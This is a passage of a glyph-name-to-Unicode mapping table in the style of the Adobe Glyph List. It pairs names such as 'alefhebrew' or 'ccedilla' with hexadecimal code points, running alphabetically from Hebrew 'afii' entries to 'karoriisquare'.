afii57717;05F1
afii57718;05F2
afii57723;FB35
afii57793;05B4
afii57794;05B5
afii57795;05B6
afii57796;05BB
afii57797;05B8
afii57798;05B7
afii57799;05B0
afii57800;05B2
afii57801;05B1
afii57802;05B3
afii57803;05C2
afii57804;05C1
afii57806;05B9
afii57807;05BC
afii57839;05BD
afii57841;05BF
afii57842;05C0
afii57929;02BC
afii61248;2105
afii61289;2113
afii61352;2116
afii61573;202C
afii61574;202D
afii61575;202E
afii61664;200C
afii63167;066D
afii64937;02BD
agrave;00E0
agujarati;0A85
agurmukhi;0A05
ahiragana;3042
ahookabove;1EA3
aibengali;0990
aibopomofo;311E
aideva;0910
aiecyrillic;04D5
aigujarati;0A90
aigurmukhi;0A10
aimatragurmukhi;0A48
ainarabic;0639
ainfinalarabic;FECA
aininitialarabic;FECB
ainmedialarabic;FECC
ainvertedbreve;0203
aivowelsignbengali;09C8
aivowelsigndeva;0948
aivowelsigngujarati;0AC8
akatakana;30A2
akatakanahalfwidth;FF71
akorean;314F
alef;05D0
alefarabic;0627
alefdageshhebrew;FB30
aleffinalarabic;FE8E
alefhamzaabovearabic;0623
alefhamzaabovefinalarabic;FE84
alefhamzabelowarabic;0625
alefhamzabelowfinalarabic;FE88
alefhebrew;05D0
aleflamedhebrew;FB4F
alefmaddaabovearabic;0622
alefmaddaabovefinalarabic;FE82
alefmaksuraarabic;0649
alefmaksurafinalarabic;FEF0
alefmaksurainitialarabic;FEF3
alefmaksuramedialarabic;FEF4
alefpatahhebrew;FB2E
alefqamatshebrew;FB2F
aleph;2135
allequal;224C
alpha;03B1
alphatonos;03AC
amacron;0101
amonospace;FF41
ampersand;0026
ampersandmonospace;FF06
ampersandsmall;F726
amsquare;33C2
anbopomofo;3122
angbopomofo;3124
angkhankhuthai;0E5A
angle;2220
anglebracketleft;3008
anglebracketleftvertical;FE3F
anglebracketright;3009
anglebracketrightvertical;FE40
angleleft;2329
angleright;232A
angstrom;212B
anoteleia;0387
anudattadeva;0952
anusvarabengali;0982
anusvaradeva;0902
anusvaragujarati;0A82
aogonek;0105
apaatosquare;3300
aparen;249C
apostrophearmenian;055A
apostrophemod;02BC
apple;F8FF
approaches;2250
approxequal;2248
approxequalorimage;2252
approximatelyequal;2245
araeaekorean;318E
araeakorean;318D
arc;2312
arighthalfring;1E9A
aring;00E5
aringacute;01FB
aringbelow;1E01
arrowboth;2194
arrowdashdown;21E3
arrowdashleft;21E0
arrowdashright;21E2
arrowdashup;21E1
arrowdblboth;21D4
arrowdbldown;21D3
arrowdblleft;21D0
arrowdblright;21D2
arrowdblup;21D1
arrowdown;2193
arrowdownleft;2199
arrowdownright;2198
arrowdownwhite;21E9
arrowheaddownmod;02C5
arrowheadleftmod;02C2
arrowheadrightmod;02C3
arrowheadupmod;02C4
arrowhorizex;F8E7
arrowleft;2190
arrowleftdbl;21D0
arrowleftdblstroke;21CD
arrowleftoverright;21C6
arrowleftwhite;21E6
arrowright;2192
arrowrightdblstroke;21CF
arrowrightheavy;279E
arrowrightoverleft;21C4
arrowrightwhite;21E8
arrowtableft;21E4
arrowtabright;21E5
arrowup;2191
arrowupdn;2195
arrowupdnbse;21A8
arrowupdownbase;21A8
arrowupleft;2196
arrowupleftofdown;21C5
arrowupright;2197
arrowupwhite;21E7
arrowvertex;F8E6
asciicircum;005E
asciicircummonospace;FF3E
asciitilde;007E
asciitildemonospace;FF5E
ascript;0251
ascriptturned;0252
asmallhiragana;3041
asmallkatakana;30A1
asmallkatakanahalfwidth;FF67
asterisk;002A
asteriskaltonearabic;066D
asteriskarabic;066D
asteriskmath;2217
asteriskmonospace;FF0A
asterisksmall;FE61
asterism;2042
asuperior;F6E9
asymptoticallyequal;2243
at;0040
atilde;00E3
atmonospace;FF20
atsmall;FE6B
aturned;0250
aubengali;0994
aubopomofo;3120
audeva;0914
augujarati;0A94
augurmukhi;0A14
aulengthmarkbengali;09D7
aumatragurmukhi;0A4C
auvowelsignbengali;09CC
auvowelsigndeva;094C
auvowelsigngujarati;0ACC
avagrahadeva;093D
aybarmenian;0561
ayin;05E2
ayinaltonehebrew;FB20
ayinhebrew;05E2
b;0062
babengali;09AC
backslash;005C
backslashmonospace;FF3C
badeva;092C
bagujarati;0AAC
bagurmukhi;0A2C
bahiragana;3070
bahtthai;0E3F
bakatakana;30D0
bar;007C
barmonospace;FF5C
bbopomofo;3105
bcircle;24D1
bdotaccent;1E03
bdotbelow;1E05
beamedsixteenthnotes;266C
because;2235
becyrillic;0431
beharabic;0628
behfinalarabic;FE90
behinitialarabic;FE91
behiragana;3079
behmedialarabic;FE92
behmeeminitialarabic;FC9F
behmeemisolatedarabic;FC08
behnoonfinalarabic;FC6D
bekatakana;30D9
benarmenian;0562
bet;05D1
beta;03B2
betasymbolgreek;03D0
betdagesh;FB31
betdageshhebrew;FB31
bethebrew;05D1
betrafehebrew;FB4C
bhabengali;09AD
bhadeva;092D
bhagujarati;0AAD
bhagurmukhi;0A2D
bhook;0253
bihiragana;3073
bikatakana;30D3
bilabialclick;0298
bindigurmukhi;0A02
birusquare;3331
blackcircle;25CF
blackdiamond;25C6
blackdownpointingtriangle;25BC
blackleftpointingpointer;25C4
blackleftpointingtriangle;25C0
blacklenticularbracketleft;3010
blacklenticularbracketleftvertical;FE3B
blacklenticularbracketright;3011
blacklenticularbracketrightvertical;FE3C
blacklowerlefttriangle;25E3
blacklowerrighttriangle;25E2
blackrectangle;25AC
blackrightpointingpointer;25BA
blackrightpointingtriangle;25B6
blacksmallsquare;25AA
blacksmilingface;263B
blacksquare;25A0
blackstar;2605
blackupperlefttriangle;25E4
blackupperrighttriangle;25E5
blackuppointingsmalltriangle;25B4
blackuppointingtriangle;25B2
blank;2423
blinebelow;1E07
block;2588
bmonospace;FF42
bobaimaithai;0E1A
bohiragana;307C
bokatakana;30DC
bparen;249D
bqsquare;33C3
braceex;F8F4
braceleft;007B
braceleftbt;F8F3
braceleftmid;F8F2
braceleftmonospace;FF5B
braceleftsmall;FE5B
bracelefttp;F8F1
braceleftvertical;FE37
braceright;007D
bracerightbt;F8FE
bracerightmid;F8FD
bracerightmonospace;FF5D
bracerightsmall;FE5C
bracerighttp;F8FC
bracerightvertical;FE38
bracketleft;005B
bracketleftbt;F8F0
bracketleftex;F8EF
bracketleftmonospace;FF3B
bracketlefttp;F8EE
bracketright;005D
bracketrightbt;F8FB
bracketrightex;F8FA
bracketrightmonospace;FF3D
bracketrighttp;F8F9
breve;02D8
brevebelowcmb;032E
brevecmb;0306
breveinvertedbelowcmb;032F
breveinvertedcmb;0311
breveinverteddoublecmb;0361
bridgebelowcmb;032A
bridgeinvertedbelowcmb;033A
brokenbar;00A6
bstroke;0180
bsuperior;F6EA
btopbar;0183
buhiragana;3076
bukatakana;30D6
bullet;2022
bulletinverse;25D8
bulletoperator;2219
bullseye;25CE
c;0063
caarmenian;056E
cabengali;099A
cacute;0107
cadeva;091A
cagujarati;0A9A
cagurmukhi;0A1A
calsquare;3388
candrabindubengali;0981
candrabinducmb;0310
candrabindudeva;0901
candrabindugujarati;0A81
capslock;21EA
careof;2105
caron;02C7
caronbelowcmb;032C
caroncmb;030C
carriagereturn;21B5
cbopomofo;3118
ccaron;010D
ccedilla;00E7
ccedillaacute;1E09
ccircle;24D2
ccircumflex;0109
ccurl;0255
cdot;010B
cdotaccent;010B
cdsquare;33C5
cedilla;00B8
cedillacmb;0327
cent;00A2
centigrade;2103
centinferior;F6DF
centmonospace;FFE0
centoldstyle;F7A2
centsuperior;F6E0
chaarmenian;0579
chabengali;099B
chadeva;091B
chagujarati;0A9B
chagurmukhi;0A1B
chbopomofo;3114
cheabkhasiancyrillic;04BD
checkmark;2713
checyrillic;0447
chedescenderabkhasiancyrillic;04BF
chedescendercyrillic;04B7
chedieresiscyrillic;04F5
cheharmenian;0573
chekhakassiancyrillic;04CC
cheverticalstrokecyrillic;04B9
chi;03C7
chieuchacirclekorean;3277
chieuchaparenkorean;3217
chieuchcirclekorean;3269
chieuchkorean;314A
chieuchparenkorean;3209
chochangthai;0E0A
chochanthai;0E08
chochingthai;0E09
chochoethai;0E0C
chook;0188
cieucacirclekorean;3276
cieucaparenkorean;3216
cieuccirclekorean;3268
cieuckorean;3148
cieucparenkorean;3208
cieucuparenkorean;321C
circle;25CB
circlemultiply;2297
circleot;2299
circleplus;2295
circlepostalmark;3036
circlewithlefthalfblack;25D0
circlewithrighthalfblack;25D1
circumflex;02C6
circumflexbelowcmb;032D
circumflexcmb;0302
clear;2327
clickalveolar;01C2
clickdental;01C0
clicklateral;01C1
clickretroflex;01C3
club;2663
clubsuitblack;2663
clubsuitwhite;2667
cmcubedsquare;33A4
cmonospace;FF43
cmsquaredsquare;33A0
coarmenian;0581
colon;003A
colonmonetary;20A1
colonmonospace;FF1A
colonsign;20A1
colonsmall;FE55
colontriangularhalfmod;02D1
colontriangularmod;02D0
comma;002C
commaabovecmb;0313
commaaboverightcmb;0315
commaaccent;F6C3
commaarabic;060C
commaarmenian;055D
commainferior;F6E1
commamonospace;FF0C
commareversedabovecmb;0314
commareversedmod;02BD
commasmall;FE50
commasuperior;F6E2
commaturnedabovecmb;0312
commaturnedmod;02BB
compass;263C
congruent;2245
contourintegral;222E
control;2303
controlACK;0006
controlBEL;0007
controlBS;0008
controlCAN;0018
controlCR;000D
controlDC1;0011
controlDC2;0012
controlDC3;0013
controlDC4;0014
controlDEL;007F
controlDLE;0010
controlEM;0019
controlENQ;0005
controlEOT;0004
controlESC;001B
controlETB;0017
controlETX;0003
controlFF;000C
controlFS;001C
controlGS;001D
controlHT;0009
controlLF;000A
controlNAK;0015
controlRS;001E
controlSI;000F
controlSO;000E
controlSOT;0002
controlSTX;0001
controlSUB;001A
controlSYN;0016
controlUS;001F
controlVT;000B
copyright;00A9
copyrightsans;F8E9
copyrightserif;F6D9
cornerbracketleft;300C
cornerbracketlefthalfwidth;FF62
cornerbracketleftvertical;FE41
cornerbracketright;300D
cornerbracketrighthalfwidth;FF63
cornerbracketrightvertical;FE42
corporationsquare;337F
cosquare;33C7
coverkgsquare;33C6
cparen;249E
cruzeiro;20A2
cstretched;0297
curlyand;22CF
curlyor;22CE
currency;00A4
cyrBreve;F6D1
cyrFlex;F6D2
cyrbreve;F6D4
cyrflex;F6D5
d;0064
daarmenian;0564
dabengali;09A6
dadarabic;0636
dadeva;0926
dadfinalarabic;FEBE
dadinitialarabic;FEBF
dadmedialarabic;FEC0
dagesh;05BC
dageshhebrew;05BC
dagger;2020
daggerdbl;2021
dagujarati;0AA6
dagurmukhi;0A26
dahiragana;3060
dakatakana;30C0
dalarabic;062F
dalet;05D3
daletdagesh;FB33
daletdageshhebrew;FB33
dalethatafpatah;05D3 05B2
dalethatafpatahhebrew;05D3 05B2
dalethatafsegol;05D3 05B1
dalethatafsegolhebrew;05D3 05B1
dalethebrew;05D3
dalethiriq;05D3 05B4
dalethiriqhebrew;05D3 05B4
daletholam;05D3 05B9
daletholamhebrew;05D3 05B9
daletpatah;05D3 05B7
daletpatahhebrew;05D3 05B7
daletqamats;05D3 05B8
daletqamatshebrew;05D3 05B8
daletqubuts;05D3 05BB
daletqubutshebrew;05D3 05BB
daletsegol;05D3 05B6
daletsegolhebrew;05D3 05B6
daletsheva;05D3 05B0
daletshevahebrew;05D3 05B0
dalettsere;05D3 05B5
dalettserehebrew;05D3 05B5
dalfinalarabic;FEAA
dammaarabic;064F
dammalowarabic;064F
dammatanaltonearabic;064C
dammatanarabic;064C
danda;0964
dargahebrew;05A7
dargalefthebrew;05A7
dasiapneumatacyrilliccmb;0485
dblGrave;F6D3
dblanglebracketleft;300A
dblanglebracketleftvertical;FE3D
dblanglebracketright;300B
dblanglebracketrightvertical;FE3E
dblarchinvertedbelowcmb;032B
dblarrowleft;21D4
dblarrowright;21D2
dbldanda;0965
dblgrave;F6D6
dblgravecmb;030F
dblintegral;222C
dbllowline;2017
dbllowlinecmb;0333
dbloverlinecmb;033F
dblprimemod;02BA
dblverticalbar;2016
dblverticallineabovecmb;030E
dbopomofo;3109
dbsquare;33C8
dcaron;010F
dcedilla;1E11
dcircle;24D3
dcircumflexbelow;1E13
dcroat;0111
ddabengali;09A1
ddadeva;0921
ddagujarati;0AA1
ddagurmukhi;0A21
ddalarabic;0688
ddalfinalarabic;FB89
dddhadeva;095C
ddhabengali;09A2
ddhadeva;0922
ddhagujarati;0AA2
ddhagurmukhi;0A22
ddotaccent;1E0B
ddotbelow;1E0D
decimalseparatorarabic;066B
decimalseparatorpersian;066B
decyrillic;0434
degree;00B0
dehihebrew;05AD
dehiragana;3067
deicoptic;03EF
dekatakana;30C7
deleteleft;232B
deleteright;2326
delta;03B4
deltaturned;018D
denominatorminusonenumeratorbengali;09F8
dezh;02A4
dhabengali;09A7
dhadeva;0927
dhagujarati;0AA7
dhagurmukhi;0A27
dhook;0257
dialytikatonos;0385
dialytikatonoscmb;0344
diamond;2666
diamondsuitwhite;2662
dieresis;00A8
dieresisacute;F6D7
dieresisbelowcmb;0324
dieresiscmb;0308
dieresisgrave;F6D8
dieresistonos;0385
dihiragana;3062
dikatakana;30C2
dittomark;3003
divide;00F7
divides;2223
divisionslash;2215
djecyrillic;0452
dkshade;2593
dlinebelow;1E0F
dlsquare;3397
dmacron;0111
dmonospace;FF44
dnblock;2584
dochadathai;0E0E
dodekthai;0E14
dohiragana;3069
dokatakana;30C9
dollar;0024
dollarinferior;F6E3
dollarmonospace;FF04
dollaroldstyle;F724
dollarsmall;FE69
dollarsuperior;F6E4
dong;20AB
dorusquare;3326
dotaccent;02D9
dotaccentcmb;0307
dotbelowcmb;0323
dotbelowcomb;0323
dotkatakana;30FB
dotlessi;0131
dotlessj;F6BE
dotlessjstrokehook;0284
dotmath;22C5
dottedcircle;25CC
doubleyodpatah;FB1F
doubleyodpatahhebrew;FB1F
downtackbelowcmb;031E
downtackmod;02D5
dparen;249F
dsuperior;F6EB
dtail;0256
dtopbar;018C
duhiragana;3065
dukatakana;30C5
dz;01F3
dzaltone;02A3
dzcaron;01C6
dzcurl;02A5
dzeabkhasiancyrillic;04E1
dzecyrillic;0455
dzhecyrillic;045F
e;0065
eacute;00E9
earth;2641
ebengali;098F
ebopomofo;311C
ebreve;0115
ecandradeva;090D
ecandragujarati;0A8D
ecandravowelsigndeva;0945
ecandravowelsigngujarati;0AC5
ecaron;011B
ecedillabreve;1E1D
echarmenian;0565
echyiwnarmenian;0587
ecircle;24D4
ecircumflex;00EA
ecircumflexacute;1EBF
ecircumflexbelow;1E19
ecircumflexdotbelow;1EC7
ecircumflexgrave;1EC1
ecircumflexhookabove;1EC3
ecircumflextilde;1EC5
ecyrillic;0454
edblgrave;0205
edeva;090F
edieresis;00EB
edot;0117
edotaccent;0117
edotbelow;1EB9
eegurmukhi;0A0F
eematragurmukhi;0A47
efcyrillic;0444
egrave;00E8
egujarati;0A8F
eharmenian;0567
ehbopomofo;311D
ehiragana;3048
ehookabove;1EBB
eibopomofo;311F
eight;0038
eightarabic;0668
eightbengali;09EE
eightcircle;2467
eightcircleinversesansserif;2791
eightdeva;096E
eighteencircle;2471
eighteenparen;2485
eighteenperiod;2499
eightgujarati;0AEE
eightgurmukhi;0A6E
eighthackarabic;0668
eighthangzhou;3028
eighthnotebeamed;266B
eightideographicparen;3227
eightinferior;2088
eightmonospace;FF18
eightoldstyle;F738
eightparen;247B
eightperiod;248F
eightpersian;06F8
eightroman;2177
eightsuperior;2078
eightthai;0E58
einvertedbreve;0207
eiotifiedcyrillic;0465
ekatakana;30A8
ekatakanahalfwidth;FF74
ekonkargurmukhi;0A74
ekorean;3154
elcyrillic;043B
element;2208
elevencircle;246A
elevenparen;247E
elevenperiod;2492
elevenroman;217A
ellipsis;2026
ellipsisvertical;22EE
emacron;0113
emacronacute;1E17
emacrongrave;1E15
emcyrillic;043C
emdash;2014
emdashvertical;FE31
emonospace;FF45
emphasismarkarmenian;055B
emptyset;2205
enbopomofo;3123
encyrillic;043D
endash;2013
endashvertical;FE32
endescendercyrillic;04A3
eng;014B
engbopomofo;3125
enghecyrillic;04A5
enhookcyrillic;04C8
enspace;2002
eogonek;0119
eokorean;3153
eopen;025B
eopenclosed;029A
eopenreversed;025C
eopenreversedclosed;025E
eopenreversedhook;025D
eparen;24A0
epsilon;03B5
epsilontonos;03AD
equal;003D
equalmonospace;FF1D
equalsmall;FE66
equalsuperior;207C
equivalence;2261
erbopomofo;3126
ercyrillic;0440
ereversed;0258
ereversedcyrillic;044D
escyrillic;0441
esdescendercyrillic;04AB
esh;0283
eshcurl;0286
eshortdeva;090E
eshortvowelsigndeva;0946
eshreversedloop;01AA
eshsquatreversed;0285
esmallhiragana;3047
esmallkatakana;30A7
esmallkatakanahalfwidth;FF6A
estimated;212E
esuperior;F6EC
eta;03B7
etarmenian;0568
etatonos;03AE
eth;00F0
etilde;1EBD
etildebelow;1E1B
etnahtafoukhhebrew;0591
etnahtafoukhlefthebrew;0591
etnahtahebrew;0591
etnahtalefthebrew;0591
eturned;01DD
eukorean;3161
euro;20AC
evowelsignbengali;09C7
evowelsigndeva;0947
evowelsigngujarati;0AC7
exclam;0021
exclamarmenian;055C
exclamdbl;203C
exclamdown;00A1
exclamdownsmall;F7A1
exclammonospace;FF01
exclamsmall;F721
existential;2203
ezh;0292
ezhcaron;01EF
ezhcurl;0293
ezhreversed;01B9
ezhtail;01BA
f;0066
fadeva;095E
fagurmukhi;0A5E
fahrenheit;2109
fathaarabic;064E
fathalowarabic;064E
fathatanarabic;064B
fbopomofo;3108
fcircle;24D5
fdotaccent;1E1F
feharabic;0641
feharmenian;0586
fehfinalarabic;FED2
fehinitialarabic;FED3
fehmedialarabic;FED4
feicoptic;03E5
female;2640
ff;FB00
ffi;FB03
ffl;FB04
fi;FB01
fifteencircle;246E
fifteenparen;2482
fifteenperiod;2496
figuredash;2012
filledbox;25A0
filledrect;25AC
finalkaf;05DA
finalkafdagesh;FB3A
finalkafdageshhebrew;FB3A
finalkafhebrew;05DA
finalkafqamats;05DA 05B8
finalkafqamatshebrew;05DA 05B8
finalkafsheva;05DA 05B0
finalkafshevahebrew;05DA 05B0
finalmem;05DD
finalmemhebrew;05DD
finalnun;05DF
finalnunhebrew;05DF
finalpe;05E3
finalpehebrew;05E3
finaltsadi;05E5
finaltsadihebrew;05E5
firsttonechinese;02C9
fisheye;25C9
fitacyrillic;0473
five;0035
fivearabic;0665
fivebengali;09EB
fivecircle;2464
fivecircleinversesansserif;278E
fivedeva;096B
fiveeighths;215D
fivegujarati;0AEB
fivegurmukhi;0A6B
fivehackarabic;0665
fivehangzhou;3025
fiveideographicparen;3224
fiveinferior;2085
fivemonospace;FF15
fiveoldstyle;F735
fiveparen;2478
fiveperiod;248C
fivepersian;06F5
fiveroman;2174
fivesuperior;2075
fivethai;0E55
fl;FB02
florin;0192
fmonospace;FF46
fmsquare;3399
fofanthai;0E1F
fofathai;0E1D
fongmanthai;0E4F
forall;2200
four;0034
fourarabic;0664
fourbengali;09EA
fourcircle;2463
fourcircleinversesansserif;278D
fourdeva;096A
fourgujarati;0AEA
fourgurmukhi;0A6A
fourhackarabic;0664
fourhangzhou;3024
fourideographicparen;3223
fourinferior;2084
fourmonospace;FF14
fournumeratorbengali;09F7
fouroldstyle;F734
fourparen;2477
fourperiod;248B
fourpersian;06F4
fourroman;2173
foursuperior;2074
fourteencircle;246D
fourteenparen;2481
fourteenperiod;2495
fourthai;0E54
fourthtonechinese;02CB
fparen;24A1
fraction;2044
franc;20A3
g;0067
gabengali;0997
gacute;01F5
gadeva;0917
gafarabic;06AF
gaffinalarabic;FB93
gafinitialarabic;FB94
gafmedialarabic;FB95
gagujarati;0A97
gagurmukhi;0A17
gahiragana;304C
gakatakana;30AC
gamma;03B3
gammalatinsmall;0263
gammasuperior;02E0
gangiacoptic;03EB
gbopomofo;310D
gbreve;011F
gcaron;01E7
gcedilla;0123
gcircle;24D6
gcircumflex;011D
gcommaaccent;0123
gdot;0121
gdotaccent;0121
gecyrillic;0433
gehiragana;3052
gekatakana;30B2
geometricallyequal;2251
gereshaccenthebrew;059C
gereshhebrew;05F3
gereshmuqdamhebrew;059D
germandbls;00DF
gershayimaccenthebrew;059E
gershayimhebrew;05F4
getamark;3013
ghabengali;0998
ghadarmenian;0572
ghadeva;0918
ghagujarati;0A98
ghagurmukhi;0A18
ghainarabic;063A
ghainfinalarabic;FECE
ghaininitialarabic;FECF
ghainmedialarabic;FED0
ghemiddlehookcyrillic;0495
ghestrokecyrillic;0493
gheupturncyrillic;0491
ghhadeva;095A
ghhagurmukhi;0A5A
ghook;0260
ghzsquare;3393
gihiragana;304E
gikatakana;30AE
gimarmenian;0563
gimel;05D2
gimeldagesh;FB32
gimeldageshhebrew;FB32
gimelhebrew;05D2
gjecyrillic;0453
glottalinvertedstroke;01BE
glottalstop;0294
glottalstopinverted;0296
glottalstopmod;02C0
glottalstopreversed;0295
glottalstopreversedmod;02C1
glottalstopreversedsuperior;02E4
glottalstopstroke;02A1
glottalstopstrokereversed;02A2
gmacron;1E21
gmonospace;FF47
gohiragana;3054
gokatakana;30B4
gparen;24A2
gpasquare;33AC
gradient;2207
grave;0060
gravebelowcmb;0316
gravecmb;0300
gravecomb;0300
gravedeva;0953
gravelowmod;02CE
gravemonospace;FF40
gravetonecmb;0340
greater;003E
greaterequal;2265
greaterequalorless;22DB
greatermonospace;FF1E
greaterorequivalent;2273
greaterorless;2277
greateroverequal;2267
greatersmall;FE65
gscript;0261
gstroke;01E5
guhiragana;3050
guillemotleft;00AB
guillemotright;00BB
guilsinglleft;2039
guilsinglright;203A
gukatakana;30B0
guramusquare;3318
gysquare;33C9
h;0068
haabkhasiancyrillic;04A9
haaltonearabic;06C1
habengali;09B9
hadescendercyrillic;04B3
hadeva;0939
hagujarati;0AB9
hagurmukhi;0A39
haharabic;062D
hahfinalarabic;FEA2
hahinitialarabic;FEA3
hahiragana;306F
hahmedialarabic;FEA4
haitusquare;332A
hakatakana;30CF
hakatakanahalfwidth;FF8A
halantgurmukhi;0A4D
hamzaarabic;0621
hamzadammaarabic;0621 064F
hamzadammatanarabic;0621 064C
hamzafathaarabic;0621 064E
hamzafathatanarabic;0621 064B
hamzalowarabic;0621
hamzalowkasraarabic;0621 0650
hamzalowkasratanarabic;0621 064D
hamzasukunarabic;0621 0652
hangulfiller;3164
hardsigncyrillic;044A
harpoonleftbarbup;21BC
harpoonrightbarbup;21C0
hasquare;33CA
hatafpatah;05B2
hatafpatah16;05B2
hatafpatah23;05B2
hatafpatah2f;05B2
hatafpatahhebrew;05B2
hatafpatahnarrowhebrew;05B2
hatafpatahquarterhebrew;05B2
hatafpatahwidehebrew;05B2
hatafqamats;05B3
hatafqamats1b;05B3
hatafqamats28;05B3
hatafqamats34;05B3
hatafqamatshebrew;05B3
hatafqamatsnarrowhebrew;05B3
hatafqamatsquarterhebrew;05B3
hatafqamatswidehebrew;05B3
hatafsegol;05B1
hatafsegol17;05B1
hatafsegol24;05B1
hatafsegol30;05B1
hatafsegolhebrew;05B1
hatafsegolnarrowhebrew;05B1
hatafsegolquarterhebrew;05B1
hatafsegolwidehebrew;05B1
hbar;0127
hbopomofo;310F
hbrevebelow;1E2B
hcedilla;1E29
hcircle;24D7
hcircumflex;0125
hdieresis;1E27
hdotaccent;1E23
hdotbelow;1E25
he;05D4
heart;2665
heartsuitblack;2665
heartsuitwhite;2661
hedagesh;FB34
hedageshhebrew;FB34
hehaltonearabic;06C1
heharabic;0647
hehebrew;05D4
hehfinalaltonearabic;FBA7
hehfinalalttwoarabic;FEEA
hehfinalarabic;FEEA
hehhamzaabovefinalarabic;FBA5
hehhamzaaboveisolatedarabic;FBA4
hehinitialaltonearabic;FBA8
hehinitialarabic;FEEB
hehiragana;3078
hehmedialaltonearabic;FBA9
hehmedialarabic;FEEC
heiseierasquare;337B
hekatakana;30D8
hekatakanahalfwidth;FF8D
hekutaarusquare;3336
henghook;0267
herutusquare;3339
het;05D7
hethebrew;05D7
hhook;0266
hhooksuperior;02B1
hieuhacirclekorean;327B
hieuhaparenkorean;321B
hieuhcirclekorean;326D
hieuhkorean;314E
hieuhparenkorean;320D
hihiragana;3072
hikatakana;30D2
hikatakanahalfwidth;FF8B
hiriq;05B4
hiriq14;05B4
hiriq21;05B4
hiriq2d;05B4
hiriqhebrew;05B4
hiriqnarrowhebrew;05B4
hiriqquarterhebrew;05B4
hiriqwidehebrew;05B4
hlinebelow;1E96
hmonospace;FF48
hoarmenian;0570
hohipthai;0E2B
hohiragana;307B
hokatakana;30DB
hokatakanahalfwidth;FF8E
holam;05B9
holam19;05B9
holam26;05B9
holam32;05B9
holamhebrew;05B9
holamnarrowhebrew;05B9
holamquarterhebrew;05B9
holamwidehebrew;05B9
honokhukthai;0E2E
hookabovecomb;0309
hookcmb;0309
hookpalatalizedbelowcmb;0321
hookretroflexbelowcmb;0322
hoonsquare;3342
horicoptic;03E9
horizontalbar;2015
horncmb;031B
hotsprings;2668
house;2302
hparen;24A3
hsuperior;02B0
hturned;0265
huhiragana;3075
huiitosquare;3333
hukatakana;30D5
hukatakanahalfwidth;FF8C
hungarumlaut;02DD
hungarumlautcmb;030B
hv;0195
hyphen;002D
hypheninferior;F6E5
hyphenmonospace;FF0D
hyphensmall;FE63
hyphensuperior;F6E6
hyphentwo;2010
i;0069
iacute;00ED
iacyrillic;044F
ibengali;0987
ibopomofo;3127
ibreve;012D
icaron;01D0
icircle;24D8
icircumflex;00EE
icyrillic;0456
idblgrave;0209
ideographearthcircle;328F
ideographfirecircle;328B
ideographicallianceparen;323F
ideographiccallparen;323A
ideographiccentrecircle;32A5
ideographicclose;3006
ideographiccomma;3001
ideographiccommaleft;FF64
ideographiccongratulationparen;3237
ideographiccorrectcircle;32A3
ideographicearthparen;322F
ideographicenterpriseparen;323D
ideographicexcellentcircle;329D
ideographicfestivalparen;3240
ideographicfinancialcircle;3296
ideographicfinancialparen;3236
ideographicfireparen;322B
ideographichaveparen;3232
ideographichighcircle;32A4
ideographiciterationmark;3005
ideographiclaborcircle;3298
ideographiclaborparen;3238
ideographicleftcircle;32A7
ideographiclowcircle;32A6
ideographicmedicinecircle;32A9
ideographicmetalparen;322E
ideographicmoonparen;322A
ideographicnameparen;3234
ideographicperiod;3002
ideographicprintcircle;329E
ideographicreachparen;3243
ideographicrepresentparen;3239
ideographicresourceparen;323E
ideographicrightcircle;32A8
ideographicsecretcircle;3299
ideographicselfparen;3242
ideographicsocietyparen;3233
ideographicspace;3000
ideographicspecialparen;3235
ideographicstockparen;3231
ideographicstudyparen;323B
ideographicsunparen;3230
ideographicsuperviseparen;323C
ideographicwaterparen;322C
ideographicwoodparen;322D
ideographiczero;3007
ideographmetalcircle;328E
ideographmooncircle;328A
ideographnamecircle;3294
ideographsuncircle;3290
ideographwatercircle;328C
ideographwoodcircle;328D
ideva;0907
idieresis;00EF
idieresisacute;1E2F
idieresiscyrillic;04E5
idotbelow;1ECB
iebrevecyrillic;04D7
iecyrillic;0435
ieungacirclekorean;3275
ieungaparenkorean;3215
ieungcirclekorean;3267
ieungkorean;3147
ieungparenkorean;3207
igrave;00EC
igujarati;0A87
igurmukhi;0A07
ihiragana;3044
ihookabove;1EC9
iibengali;0988
iicyrillic;0438
iideva;0908
iigujarati;0A88
iigurmukhi;0A08
iimatragurmukhi;0A40
iinvertedbreve;020B
iishortcyrillic;0439
iivowelsignbengali;09C0
iivowelsigndeva;0940
iivowelsigngujarati;0AC0
ij;0133
ikatakana;30A4
ikatakanahalfwidth;FF72
ikorean;3163
ilde;02DC
iluyhebrew;05AC
imacron;012B
imacroncyrillic;04E3
imageorapproximatelyequal;2253
imatragurmukhi;0A3F
imonospace;FF49
increment;2206
infinity;221E
iniarmenian;056B
integral;222B
integralbottom;2321
integralbt;2321
integralex;F8F5
integraltop;2320
integraltp;2320
intersection;2229
intisquare;3305
invbullet;25D8
invcircle;25D9
invsmileface;263B
iocyrillic;0451
iogonek;012F
iota;03B9
iotadieresis;03CA
iotadieresistonos;0390
iotalatin;0269
iotatonos;03AF
iparen;24A4
irigurmukhi;0A72
ismallhiragana;3043
ismallkatakana;30A3
ismallkatakanahalfwidth;FF68
issharbengali;09FA
istroke;0268
isuperior;F6ED
iterationhiragana;309D
iterationkatakana;30FD
itilde;0129
itildebelow;1E2D
iubopomofo;3129
iucyrillic;044E
ivowelsignbengali;09BF
ivowelsigndeva;093F
ivowelsigngujarati;0ABF
izhitsacyrillic;0475
izhitsadblgravecyrillic;0477
j;006A
jaarmenian;0571
jabengali;099C
jadeva;091C
jagujarati;0A9C
jagurmukhi;0A1C
jbopomofo;3110
jcaron;01F0
jcircle;24D9
jcircumflex;0135
jcrossedtail;029D
jdotlessstroke;025F
jecyrillic;0458
jeemarabic;062C
jeemfinalarabic;FE9E
jeeminitialarabic;FE9F
jeemmedialarabic;FEA0
jeharabic;0698
jehfinalarabic;FB8B
jhabengali;099D
jhadeva;091D
jhagujarati;0A9D
jhagurmukhi;0A1D
jheharmenian;057B
jis;3004
jmonospace;FF4A
jparen;24A5
jsuperior;02B2
k;006B
kabashkircyrillic;04A1
kabengali;0995
kacute;1E31
kacyrillic;043A
kadescendercyrillic;049B
kadeva;0915
kaf;05DB
kafarabic;0643
kafdagesh;FB3B
kafdageshhebrew;FB3B
kaffinalarabic;FEDA
kafhebrew;05DB
kafinitialarabic;FEDB
kafmedialarabic;FEDC
kafrafehebrew;FB4D
kagujarati;0A95
kagurmukhi;0A15
kahiragana;304B
kahookcyrillic;04C4
kakatakana;30AB
kakatakanahalfwidth;FF76
kappa;03BA
kappasymbolgreek;03F0
kapyeounmieumkorean;3171
kapyeounphieuphkorean;3184
kapyeounpieupkorean;3178
kapyeounssangpieupkorean;3179
karoriisquare;330D
